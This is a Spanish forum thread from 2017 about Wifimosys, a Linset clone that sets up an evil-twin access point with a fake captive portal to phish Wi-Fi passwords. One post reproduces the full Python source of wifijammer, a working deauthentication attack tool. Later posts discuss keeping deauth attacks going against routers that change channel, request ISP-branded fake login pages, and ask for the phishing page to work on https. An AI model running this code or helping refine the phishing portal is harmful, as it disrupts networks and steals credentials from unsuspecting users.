Publicado por: Vodker en 28-03-2017, 17:10 (Martes)

probado en Wifislax v4.12 y no funciona


Ya lo dije más arriba:


¿Alguien con Wifislax64, cierta soltura en usar Wifimosys y suficientes cacharretes...



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: ωarcry en 28-03-2017, 17:36 (Martes)

- Desautentificación mejorada con wifijammer en lugar de aireplay-ng (no he podido probarlo con routers que hacen channel hopping, pero en teoría ahora desautentifica a los clientes conectados, no al punto de acceso).


esto es buenisimo  >:( >:( >:(

¿y en que te basas para decir que es mejor que aireplay?

¿has leido el codigo de wifijammer?

yo lo habri en su dia, y a no ser que haya cambiado no veo ninguna funcionalidad distinta a las que tiene aireplay.

los dos consisten en mandar paquetes deauth, luego ¿cual es la diferencia?

¿que uno esta escrito en c y el otro en python?

Código:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl

# Console colors
W  = '\033[0m'  # white (normal)
R  = '\033[31m' # red
G  = '\033[32m' # green
O  = '\033[33m' # orange
B  = '\033[34m' # blue
P  = '\033[35m' # purple
C  = '\033[36m' # cyan
GR = '\033[37m' # gray
T  = '\033[93m' # tan

def parse_args():
    #Create the arguments
    parser = argparse.ArgumentParser()

    parser.add_argument("-s",
                        "--skip",
                        nargs='*',
                        default=[],
                        help="Skip deauthing this MAC address. \
                                Example: -s 00:11:BB:33:44:AA")
    parser.add_argument("-i",
                        "--interface",
                        help="Choose monitor mode interface. \
                                By default script will find the most powerful \
                                interface and starts monitor mode on it. \
                                Example: -i mon5")
    parser.add_argument("-c",
                        "--channel",
                        help="Listen on and deauth only clients on the specified channel. \
                                Example: -c 6")
    parser.add_argument("-m",
                        "--maximum",
                        help="Choose the maximum number of clients to deauth. \
                                List of clients will be emptied and repopulated \
                                after hitting the limit. Example: -m 5")
    parser.add_argument("-n",
                        "--noupdate",
                        help="Do not clear the deauth list when the maximum (-m) \
                                number of client/AP combos is reached. \
                                Must be used in conjunction with -m. \
                                Example: -m 10 -n",
                        action='store_true')
    parser.add_argument("-t",
                        "--timeinterval",
                        help="Choose the time interval between packets being sent. \
                                Default is as fast as possible. \
                                If you see scapy errors like 'no buffer space' \
                                try: -t .00001")
    parser.add_argument("-p",
                        "--packets",
                        help="Choose the number of packets to send in each deauth burst. \
                                Default value is 1; \
                                1 packet to the client and 1 packet to the AP. \
                                Send 2 deauth packets to the client \
                                and 2 deauth packets to the AP: -p 2")
    parser.add_argument("-d",
                        "--directedonly",
                        help="Skip the deauthentication packets to the broadcast \
                                address of the access points and only send them \
                                to client/AP pairs",
                        action='store_true')
    parser.add_argument("-a",
                        "--accesspoint",
                        nargs='*',
                        default=[],
                        help="Enter the SSID or MAC address of a specific access point to target")
    parser.add_argument("--world",
                        help="N. American standard is 11 channels but the rest \
                                of the world it's 13 so this options enables the \
                                scanning of 13 channels",
                        action="store_true")

    return parser.parse_args()


########################################
# Begin interface info and manipulation
########################################

def get_mon_iface(args):
    global monitor_on
    monitors, interfaces = iwconfig()
    if args.interface:
        monitor_on = True
        return args.interface
    if len(monitors) > 0:
        monitor_on = True
        return monitors[0]
    else:
        # Start monitor mode on a wireless interface
        print '['+G+'*'+W+'] Finding the most powerful interface...'
        interface = get_iface(interfaces)
        monmode = start_mon_mode(interface)
        return monmode

def iwconfig():
    monitors = []
    interfaces = {}
    try:
        proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    except OSError:
        sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue # Isn't an empty string
        if line[0] != ' ': # Doesn't start with space
            wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
            if not wired_search: # Isn't wired
                iface = line[:line.find(' ')] # is the interface
                if 'Mode:Monitor' in line:
                    monitors.append(iface)
                elif 'IEEE 802.11' in line:
                    if "ESSID:\"" in line:
                        interfaces[iface] = 1
                    else:
                        interfaces[iface] = 0
    return monitors, interfaces

def get_iface(interfaces):
    scanned_aps = []

    if len(interfaces) < 1:
        sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
    if len(interfaces) == 1:
        for interface in interfaces:
            return interface

    # Find most powerful interface
    for iface in interfaces:
        count = 0
        proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            if ' - Address:' in line: # first line in iwlist scan for a new AP
               count += 1
        scanned_aps.append((count, iface))
        print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
    try:
        interface = max(scanned_aps)[1]
        return interface
    except Exception as e:
        for iface in interfaces:
            interface = iface
            print '['+R+'-'+W+'] Minor error:',e
            print '    Starting monitor mode on '+G+interface+W
            return interface

def start_mon_mode(interface):
    print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
    try:
        os.system('ifconfig %s down' % interface)
        os.system('iwconfig %s mode monitor' % interface)
        os.system('ifconfig %s up' % interface)
        return interface
    except Exception:
        sys.exit('['+R+'-'+W+'] Could not start monitor mode')

def remove_mon_iface(mon_iface):
    os.system('ifconfig %s down' % mon_iface)
    os.system('iwconfig %s mode managed' % mon_iface)
    os.system('ifconfig %s up' % mon_iface)

def mon_mac(mon_iface):
    '''
    http://stackoverflow.com/questions/159137/getting-mac-address
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
    return mac

########################################
# End of interface info and manipulation
########################################


def channel_hop(mon_iface, args):
    '''
    First time it runs through the channels it stays on each channel for 5 seconds
    in order to populate the deauth list nicely. After that it goes as fast as it can
    '''
    global monchannel, first_pass

    channelNum = 0
    maxChan = 11 if not args.world else 13
    err = None

    while 1:
        if args.channel:
            with lock:
                monchannel = args.channel
        else:
            channelNum +=1
            if channelNum > maxChan:
                channelNum = 1
                with lock:
                    first_pass = 0
            with lock:
                monchannel = str(channelNum)

            try:
                proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
            except OSError:
                print '['+R+'-'+W+'] Could not execute "iw"'
                os.kill(os.getpid(),SIGINT)
                sys.exit(1)
            for line in proc.communicate()[1].split('\n'):
                if len(line) > 2: # iw dev shouldnt display output unless there's an error
                    err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W

        output(err, monchannel)
        if args.channel:
            time.sleep(.05)
        else:
            # For the first channel hop thru, do not deauth
            if first_pass == 1:
                time.sleep(1)
                continue

        deauth(monchannel)


def deauth(monchannel):
    '''
    addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
    multi-APs to one gateway. Constantly scans the clients_APs list and
    starts a thread to deauth each instance
    '''

    pkts = []

    if len(clients_APs) > 0:
        with lock:
            for x in clients_APs:
                client = x[0]
                ap = x[1]
                ch = x[2]
                # Can't add a RadioTap() layer as the first layer or it's a malformed
                # Association request packet?
                # Append the packets to a new list so we don't have to hog the lock
                # type=0, subtype=12?
                if ch == monchannel:
                    deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
                    deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
                    pkts.append(deauth_pkt1)
                    pkts.append(deauth_pkt2)
    if len(APs) > 0:
        if not args.directedonly:
            with lock:
                for a in APs:
                    ap = a[0]
                    ch = a[1]
                    if ch == monchannel:
                        deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
                        pkts.append(deauth_ap)

    if len(pkts) > 0:
        # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
        if not args.timeinterval:
            args.timeinterval = 0
        if not args.packets:
            args.packets = 1

        for p in pkts:
            send(p, inter=float(args.timeinterval), count=int(args.packets))

def output(err, monchannel):
    os.system('clear')
    if err:
        print err
    else:
        print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
    if len(clients_APs) > 0:
        print '                  Deauthing                 ch   ESSID'
    # Print the deauth list
    with lock:
        for ca in clients_APs:
            if len(ca) > 3:
                print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
            else:
                print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
    if len(APs) > 0:
        print '\n      Access Points     ch   ESSID'
    with lock:
        for ap in APs:
            print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
    print ''

def noise_filter(skip, addr1, addr2):
    # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
    ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
    if skip:
        ignore += [addr.lower() for addr in skip]
    for i in ignore:
        if i in addr1 or i in addr2:
            return True

def cb(pkt):
    '''
    Look for dot11 packets that aren't to or from broadcast address,
    are type 1 or 2 (control, data), and append the addr1 and addr2
    to the list of deauth targets.
    '''
    global clients_APs, APs

    # return these if's keeping clients_APs the same or just reset clients_APs?
    # I like the idea of the tool repopulating the variable more
    if args.maximum:
        if args.noupdate:
            if len(clients_APs) > int(args.maximum):
                return
        else:
            if len(clients_APs) > int(args.maximum):
                with lock:
                    clients_APs = []
                    APs = []

    # We're adding the AP and channel to the deauth list at time of creation rather
    # than updating on the fly in order to avoid costly for loops that require a lock
    if pkt.haslayer(Dot11):
        if pkt.addr1 and pkt.addr2:
            pkt.addr1 = pkt.addr1.lower()
            pkt.addr2 = pkt.addr2.lower()

            # Filter out all other APs and clients if asked
            if args.accesspoint:
                # track bssid for essid
                if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint:
                    args.accesspoint.add(pkt[Dot11].addr3.lower())
                # bail if bssid is not in target list
                if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]):
                    # pkt does not match our target list
                    return

            if args.skip:
                if pkt.addr2 in args.skip:
                    return

            # Check if it's added to our AP list
            if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
                APs_add(clients_APs, APs, pkt, args.channel, args.world)

            # Ignore all the noisy packets like spanning tree

            #if noise_filter(skip, pkt.addr1, pkt.addr2):
            #    return

            # Management = 1, data = 2
            if pkt.type in [1, 2]:
                clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)

def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
    ssid       = pkt[Dot11Elt].info
    bssid      = pkt[Dot11].addr3.lower()
    try:
        # Thanks to airoscapy for below
        ap_channel = str(ord(pkt[Dot11Elt:3].info))
        chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
        if ap_channel not in chans:
            return

        if chan_arg:
            if ap_channel != chan_arg:
                return

    except Exception as e:
        return

    if len(APs) == 0:
        with lock:
            return APs.append([bssid, ap_channel, ssid])
    else:
        for b in APs:
            if bssid in b[0]:
                return
        with lock:
            return APs.append([bssid, ap_channel, ssid])

def clients_APs_add(clients_APs, addr1, addr2):
    if len(clients_APs) == 0:
        if len(APs) == 0:
            with lock:
                return clients_APs.append([addr1, addr2, monchannel])
        else:
            AP_check(addr1, addr2)

    # Append new clients/APs if they're not in the list
    else:
        for ca in clients_APs:
            if addr1 in ca and addr2 in ca:
                return

        if len(APs) > 0:
            return AP_check(addr1, addr2)
        else:
            with lock:
                return clients_APs.append([addr1, addr2, monchannel])

def AP_check(addr1, addr2):
    for ap in APs:
        if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
            with lock:
                return clients_APs.append([addr1, addr2, ap[1], ap[2]])

def stop(signal, frame):
    if monitor_on:
        sys.exit('\n['+R+'!'+W+'] Closing')
    else:
        remove_mon_iface(mon_iface)
        os.system('service network-manager restart')
        sys.exit('\n['+R+'!'+W+'] Closing')

if __name__ == "__main__":
    if os.geteuid():
        sys.exit('['+R+'-'+W+'] Please run as root')
    clients_APs = []
    APs = []
    DN = open(os.devnull, 'w')
    lock = Lock()
    args = parse_args()
    args.skip = list(map(str.lower, args.skip))
    # lowercase bssids while leaving essids intact
    args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint)
    monitor_on = None
    mon_iface = get_mon_iface(args)
    conf.iface = mon_iface
    mon_MAC = mon_mac(mon_iface)
    first_pass = 1

    # Start channel hopping
    hop = Thread(target=channel_hop, args=(mon_iface, args))
    hop.daemon = True
    hop.start()

    signal(SIGINT, stop)

    try:
        sniff(iface=mon_iface, store=0, prn=cb)
    except Exception as msg:
        remove_mon_iface(mon_iface)
        os.system('service network-manager restart')
        print '\n['+R+'!'+W+'] Closing'
        sys.exit(0)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 28-03-2017, 18:06 (Martes)

esto es buenisimo  >:( >:( >:(

¿y en que te basas para decir que es mejor que aireplay?

¿has leido el codigo de wifijammer?

yo lo habri en su dia, y a no ser que haya cambiado no veo ninguna funcionalidad distinta a las que tiene aireplay.

los dos consisten en mandar paquetes deauth, luego ¿cual es la diferencia?

¿que uno esta escrito en c y el otro en python?


Pues la diferencia es que, según el autor la opción -p funciona y permite ayudar en el tema de la desautentificación ante un router que cambia de canal al repartir los paquetes y así que no sea constantemente, que es lo que estaba intentando conseguir. Y porque ya probé tanto con aireplay-ng como con mdk3 y este va mejor, más rápido, es más bonico y más apañao  ;D

Código:
-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: ωarcry en 28-03-2017, 18:30 (Martes)

Pues la diferencia es que, según el autor la opción -p funciona y permite ayudar en el tema de la desautentificación ante un router que cambia de canal al repartir los paquetes y así que no sea constantemente, que es lo que estaba intentando conseguir. Y porque ya probé tanto con aireplay-ng como con mdk3 y este va mejor, más rápido, es más bonico y más apañao  ;D

Código:
-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP

mi ingles esta oxidadisimo, pero esto es lo que me pone el traductor de google

Citar
-p, envía 5 paquetes al cliente del AP y 5 paquetes al AP del cliente junto con 5 paquetes a la dirección de difusión del AP

no veo ahí nada de cambio de canal.

eso por un lado, y por otro, wifijammer te permite tener hostapd en un canal con el fake ap y con el mismo interface estar en otro canal mandando paquetes deauth?

porque yo lo que tengo probado es que con el mismo interface no puedes estar en misa y repicando las campanas.  ;)

oye si lo permite me la envaino y eso si seria interesante.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 28-03-2017, 18:42 (Martes)

no veo ahí nada de cambio de canal.

eso por un lado, y por otro, wifijammer te permite tener hostapd en un canal con el fake ap y con el mismo interface estar en otro canal mandando paquetes deauth?

porque yo lo que tengo probado es que con el mismo interface no puedes estar en misa y repicando las campanas.  ;)

oye si lo permite me la envaino y eso si seria interesante.


No, no he dicho que cambie de canal, eso sería verdadera magia con un mismo interface. Lo que digo es que el autor pone que la opción -p va cambiando entre atacar al AP y atacar a los clientes repartiendo paquetes, con lo cual no es un ataque constante al AP (sí lo es, pero a diferentes objetivos), lo que creo que puede ayudar a que los routers que cambian de canal ante un ataque masivo aguanten más tiempo sin cambiar o que no cambien de canal. Aireplay y mdk3 pueden enviar menos paquetes de deauth para no ser tan agresivos, pero vi bien la opción de enviar todos los paquetes posibles cambiando de objetivo para mantener esa constancia sin perder agresividad.

Pero bueno, que está ahí para ser probado y que si no funciona o no gusta, pues siempre se puede volver al aireplay.... ;)


Título: Re:
Publicado por: jorose1987 en 28-03-2017, 21:43 (Martes)
Ahh, y yo creí que el ataque seguía válido aun cambiando de canal el router tras su reinicio.

Antes lo comprobé y efectivamente al cambiar de canal el router ya el ataque no es válido.

Entendí que haría eso la nueva actualización, jaja. Ahora veo que es imposible esto.

Por tanto, Vodker si es posible ¿podrías incluir las otras novedades y arreglos a una versión con aireplay-ng? creo que con esta desautentificación funcionaría mejor y todo estaría como antes.

De todas maneras darte las gracias por tu gran trabajo.


Título: Re:
Publicado por: ampamer en 28-03-2017, 23:45 (Martes)
Ahh, y yo creí que el ataque seguía válido aun cambiando de canal el router tras su reinicio.

Antes lo comprobé y efectivamente al cambiar de canal el router ya el ataque no es válido.


 A todo esto , has vuelto a realizar  las pruebas con un router que sepas que cambia de canal  ?? O solo piensas que no funciona solo por lo que has  leído, yo aun no eh tenido chance de hacerlo pero tal vez deberías de hacer las pruebas y luego contarnos si realmente funciona o no


Título: Re:
Publicado por: jorose1987 en 28-03-2017, 23:52 (Martes)
Sí, lo dije antes. Al cambiar de canal el router el ataque ya no funciona pues no desautentifica al cliente. Hay que volver a iniciar el ataque para que vuelva a funcionar.

Yo creí que era eso lo que solucionó Vodker pero parece ser que su nueva actualización permite que el cambio de canal sea menos frecuente debido a que los paquetes de desautentificación se reparten ahora a clientes y no siempre al router o eso he entendido.

Aún así el trabajo de Vodker es impresionante.

Si pudiese ser que vuelva a poner el mdk3 en vez de wifijamer y volver a lo de antes incluyendo los nuevos arreglos estaría genial.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: USUARIONUEVO en 29-03-2017, 08:00 (Mi?rcoles)
creo que tambien podria hacerse incluyendo la opcion elegir como desautenticar..y ya esta.

hay poder elegir si wifijammer o aireplay


Título: Re: Re: WIFIMOSYS, clon de LINSET
Publicado por: jorose1987 en 29-03-2017, 11:41 (Mi?rcoles)
creo que tambien podria hacerse incluyendo la opcion elegir como desautenticar..y ya esta.

hay poder elegir si wifijammer o aireplay
Eso estaría muy bien porque creo que wifijammer también puede funcionar muy bien para evitar más cambios de canal. Estaría genial con esa opción.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: orquidea01 en 01-04-2017, 23:22 (S?bado)
Ante todo, daros las gracias por el gran aporte que realizáis en toda la comunidad.
Bueno, mi caso es que al realizar un ataque a mi router sigo navegando con las tables y moviles que tengo, si que si me voy a escanear redes veo una con el mismo nombre que la mía, pero no me desautentifica a ningún cliente y sigo navegando sin problemas, no teniendo que preocuparme de buscar otra red o estar metiendo nada de nada en ningún sitio.
Si que he probado a conectarme a la red virtual que ha generado y entonces aparece el la ventanita de que tengo que introducir la contraseña, pero claro como la red buena no la bloquea, pues ningún cliente tiene que preocuparse de buscar.
¿Me podrias echar una mano para ver donde puedo tener el problema?
Muchas gracias.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 02-04-2017, 12:14 (Domingo)
Ante todo, daros las gracias por el gran aporte que realizáis en toda la comunidad.
Bueno, mi caso es que al realizar un ataque a mi router sigo navegando con las tables y moviles que tengo, si que si me voy a escanear redes veo una con el mismo nombre que la mía, pero no me desautentifica a ningún cliente y sigo navegando sin problemas, no teniendo que preocuparme de buscar otra red o estar metiendo nada de nada en ningún sitio.
Si que he probado a conectarme a la red virtual que ha generado y entonces aparece el la ventanita de que tengo que introducir la contraseña, pero claro como la red buena no la bloquea, pues ningún cliente tiene que preocuparse de buscar.
¿Me podrias echar una mano para ver donde puedo tener el problema?
Muchas gracias.

¿Tu router es de los que cambia de canal ante un ataque deauth? Comprueba a ver si se está haciendo la desautentificación a un canal y tu router va por otro.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: ampamer en 02-04-2017, 17:20 (Domingo)
Hola Amigo vodker, se hará la implementación de ambas opciones wa wifijamer y airoscritp para la siguiente actualización ??


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: orquidea01 en 02-04-2017, 23:39 (Domingo)
Gracias por responder Vodker, mi router no cambia de canal al estar realizado el ataque, vamos lo tengo fijo manualmente en el canal 11 y acabo de realizarle un ataque y sigue en ese canal, mientras con el pc esta atacando yo con mi móvil navego perfectamente, por cualquier pagina y me he metido con el móvil en la configuración de mi router y sigue en el canal 11.

Si me puedes orientar, te lo agradezco.
 :'(



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 03-04-2017, 00:05 (Lunes)
hi

atacar un móvil no suele funcionar, por motivos que desconozco nunca he conseguido un Handshake de un movil/tablet.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: nipponsensei en 03-04-2017, 05:04 (Lunes)
Muchas gracias por esta herramienta, me facilitó mucho las pruebas que tenía que hacer con mi modem pero algo curioso me sucede: tanto con el linset original como con esta modificación, en la última versión de wifislax no me muestran los clientes conectados, tuve que bajar la 4.8 y todo funcionó de maravilla. Parece que falta algún módulo o dejaron de darle algo de soporte a mi tarjeta.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 03-04-2017, 10:43 (Lunes)
Hola Amigo vodker, se hará la implementación de ambas opciones wa wifijamer y airoscritp para la siguiente actualización ??

Para la próxima habrá grandes cambios. Hasta ahí puedo leer.

Muchas gracias por esta herramienta, me facilitó mucho las pruebas que tenía que hacer con mi modem pero algo curioso me sucede: tanto con el linset original como con esta modificación, en la última versión de wifislax no me muestran los clientes conectados, tuve que bajar la 4.8 y todo funcionó de maravilla. Parece que falta algún módulo o dejaron de darle algo de soporte a mi tarjeta.

¿Y qué tarjeta tienes? Si no aportas más datos aquí no tenemos una bola de cristal para saberlo. Wifimosys, al igual que Linset, es un script. Esto quiere decir que no incorpora ninguna herramienta sino que automatiza y hace "fáciles" las ya existentes en Wifislax. Si un proceso de Wifimosys falla (por ejemplo el servidor HTTP) siempre puedes acudir a la herramienta original (en este caso lighttpd) y comprobar su funcionamiento en tu hardware. Si la original te sigue fallando, siempre te fallará en Wifimosys o Linset puesto que el script hace uso de la misma. Si por el contrario la original te funciona bien tras trastear con sus opciones entonces sí se puede arreglar la cosa en Wifimosys trasladando los cambios si los das a conocer.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: nipponsensei en 04-04-2017, 01:09 (Martes)

¿Y qué tarjeta tienes? Si no aportas más datos aquí no tenemos una bola de cristal para saberlo. Wifimosys, al igual que Linset, es un script. Esto quiere decir que no incorpora ninguna herramienta sino que automatiza y hace "fáciles" las ya existentes en Wifislax. Si un proceso de Wifimosys falla (por ejemplo el servidor HTTP) siempre puedes acudir a la herramienta original (en este caso lighttpd) y comprobar su funcionamiento en tu hardware. Si la original te sigue fallando, siempre te fallará en Wifimosys o Linset puesto que el script hace uso de la misma. Si por el contrario la original te funciona bien tras trastear con sus opciones entonces sí se puede arreglar la cosa en Wifimosys trasladando los cambios si los das a conocer.

Saludos.

No vine en busca de asesoría como tal, solo quería comentar mi experiencia y mi tarjeta es una Broadcom BCM4318, ya es bastante antigua y supongo que por esa razón la última versión de wifislax no le da soporte completo para trabajar con linset o la variante que has desarrollado.


Título: Re:
Publicado por: jorose1987 en 07-04-2017, 11:06 (Viernes)
Vodker compañero, ¿qué novedades traerá la nueva versión?


Título: Re:
Publicado por: Vodker en 08-04-2017, 20:30 (S?bado)
Vodker compañero, ¿qué novedades traerá la nueva versión?

Pues la más llamativa, un entorno gráfico que hasta ahora me resisto a enseñar ;D. Pero eso solo es estético, habrá más cosas de importancia.
Saludos.


Título: Re:
Publicado por: jorose1987 en 08-04-2017, 23:33 (S?bado)
Qué ansias ya, jaja. Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: hugo1 en 11-04-2017, 00:47 (Martes)
Lo del chip RTL8187L era un problema ya conocido. De hecho, creo recordar que era hostapd el que no funcionaba correctamente con ese chip (sí lo hacía airbase-ng en cambio).

Intentaré hacer pruebas con airbase como alternativa si se detecta ese modelo de chipset (pero es un coñazo, hostapd es mucho más potente).

https://mega.nz/#!h1pRQQ5Y!KuArdRvOs2wx1rZZdnFLAk4616g7t4zsMEZ2JSB_e-c (https://mega.nz/#!h1pRQQ5Y!KuArdRvOs2wx1rZZdnFLAk4616g7t4zsMEZ2JSB_e-c)


Con esta aplicacion si se puede crear un ap con espacios en el nombre.Me gustaria probarlo pero el archivo ya no esta disponible.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 11-04-2017, 10:17 (Martes)
Con esta aplicacion si se puede crear un ap con espacios en el nombre.Me gustaria probarlo pero el archivo ya no esta disponible.

La versión 0.21 (ver post inicial) ya incorpora estas características. Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: ampamer en 11-04-2017, 15:27 (Martes)
hola amigo vodker , todos esptamos esperando con mucha expectativa la nueva version.. estara disponible dentro de poco??..sera que aun se mantendra la opcion de wifijamer para lo del cambio de canal???  >:(


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: gil4949 en 15-04-2017, 13:40 (S?bado)
Buenas tardes Vodker,

Sólo me he logueado para agradecer tu desarrollo y mejora del script de vk496, al cuál también agradezco.

En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)

A la espera de sorpresas en tu nueva versión  ;D

Un saludo!


Título: Re: Re: WIFIMOSYS, clon de LINSET
Publicado por: tabiritrero en 15-04-2017, 13:44 (S?bado)
Buenas tardes Vodker,

Sólo me he logueado para agradecer tu desarrollo y mejora del script de vk496, al cuál también agradezco.

En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)

A la espera de sorpresas en tu nueva versión  ;D

Un saludo!
:) Esperando la nueva versión


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 15-04-2017, 14:10 (S?bado)
En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)

Eso nosotros no podemos hacerlo, los logos de esas empresas están protegidos por copyright y no son de uso público. En este foro solo hacemos cosas legales.

Lo que si puedes aprender es a modificar tu mismo el archivo HTML.


saludos


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 15-04-2017, 23:00 (S?bado)

Eso nosotros no podemos hacerlo, los logos de esas empresas están protegidos por copyright y no son de uso público. En este foro solo hacemos cosas legales.

Lo que si puedes aprender es a modificar tu mismo el archivo HTML.

saludos

Cooorrecto. Es sabido que este tipo de ataque va dirigido a tontainas que van dando su clave al primero que se la pide. Mostrar o no el logo de la compañía no cambia nada, el tontaina que pueda dar su clave no se suele fijar en esas cosas.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: La-bestia en 16-04-2017, 16:35 (Domingo)
Buenas tardes Vodker,

Sólo me he logueado para agradecer tu desarrollo y mejora del script de vk496, al cuál también agradezco.

En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)

A la espera de sorpresas en tu nueva versión  ;D

Un saludo!



Si quieres tocar el temita de la programación en css, html, etc pues no estaría mal que hagas otra versión de LINSET a tu manera. A mí me interesaría uno que tenga wifijammer.py pero no sé como lograrlo. Haber si me echan una mano. Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 16-04-2017, 17:04 (Domingo)
Juraria que la versión actual ya usa WifiHammer

He cambiado la desautentificación de aireplay-ng a wifijammer.py (incluído en la 64) y probando la última versión de wifijammer de hace un par de semanas Wifimosys necesita unos pequeños cambios para cerrar el programa (de python a python2). Lo que he subido funciona en Wifislax64 pero si actualizas wifijammer a la última avísame y le hago los retoques al script.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: La-bestia en 17-04-2017, 02:59 (Lunes)
Juraria que la versión actual ya usa WifiHammer

He cambiado la desautentificación de aireplay-ng a wifijammer.py (incluído en la 64) y probando la última versión de wifijammer de hace un par de semanas Wifimosys necesita unos pequeños cambios para cerrar el programa (de python a python2). Lo que he subido funciona en Wifislax64 pero si actualizas wifijammer a la última avísame y le hago los retoques al script.

Ah pues mucho mejor. Pero pasa algo si está en activo MDK3 y Wifijammer a la vez?.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 17-04-2017, 06:41 (Lunes)
Da lo mismo, pero obviamente no podrás usar los dos a la vez con un solo adaptador WiFi.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: La-bestia en 18-04-2017, 00:55 (Martes)
Da lo mismo, pero obviamente no podrás usar los dos a la vez con un solo adaptador WiFi.

Ah vale,  yo tengo 2 adaptadores usb wifi. No sé si lo vistes por Youtube pero hay un LINSET de ataque doble y creo que hace lo mismo que estoy diciendo.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 18-04-2017, 02:47 (Martes)
No he llegado a usar esa versión.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 04-05-2017, 10:47 (Jueves)
He subido a github la versión 0.22 con su módulo, que se me había olvidado  ^-^

Saludos.


Título: Re:
Publicado por: jorose1987 en 04-05-2017, 20:51 (Jueves)
Gracias Vodker, voy a probarla cuando sea posible.

Dices que incorporas wifijammer, en mi opinión debería poderse elegir el metódo de desautentificación ya sea con aireplay-ng/mdk3 o wifijammer si es posible claro.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: raiden2020 en 05-05-2017, 01:42 (Viernes)
Hola Vodker!
Felicitaciones por el gran trabajo que realizas!
Una consulta: la nueva versión del módulo ya está modificada para que la página fake aparezca también en direcciones "https" ?
